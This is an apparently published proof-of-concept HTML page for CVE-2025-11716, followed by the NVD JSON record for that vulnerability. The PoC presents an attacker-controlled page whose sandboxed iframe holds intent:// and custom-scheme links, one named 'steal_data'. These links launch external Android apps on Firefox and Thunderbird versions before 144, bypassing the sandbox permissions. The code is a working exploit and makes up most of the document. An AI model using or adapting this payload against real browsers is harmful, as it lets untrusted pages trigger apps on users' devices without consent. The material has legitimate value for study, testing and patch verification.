CVE-2025-11716

<!-- CVE-2025-11716 PoC: Sandbox iframe permission bypass on Android Firefox/Thunderbird --> <!-- This PoC demonstrates how a sandboxed iframe can open external apps without proper 'allow-' permissions --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CVE-2025-11716 PoC</title> </head> <body> <h1>Malicious Page (Attacker Controlled)</h1> <p>Click the link below to trigger the vulnerability:</p> <!-- The sandboxed iframe contains a link that can open an external Android app --> <!-- Without proper 'allow-popups' or 'allow-popups-to-escape-sandbox', this should be blocked --> <!-- But due to CVE-2025-11716, the external app launches anyway --> <iframe sandbox="allow-scripts" src="malicious_iframe.html" style="width: 600px; height: 200px; border: 1px solid red;"> </iframe> <!-- malicious_iframe.html content (loaded in sandboxed iframe): --> <!-- <!DOCTYPE html> <html> <body> <h2>Sandboxed Content</h2> <a href="intent://#Intent;scheme=myapp;package=com.example.targetapp;S.browser_fallback_url=https://example.com;end"> Click here (triggers external app on vulnerable Firefox < 144) </a> <a href="myapp://action/steal_data?param=value"> Alternative: Direct custom scheme link </a> </body> </html> --> </body> </html>

{"cve": {"id": "CVE-2025-11716", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:37.910", "lastModified": "2026-04-13T15:16:40.740", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Links in a sandboxed iframe could open an external app on Android without the required \"allow-\" permission. This vulnerability was fixed in Firefox 144 and Thunderbird 144."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "DC554AD6-8F3F-4C92-85EA-C204204E9E9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "F7398846-C620-42AF-86CA-60C09184768A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1818679", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}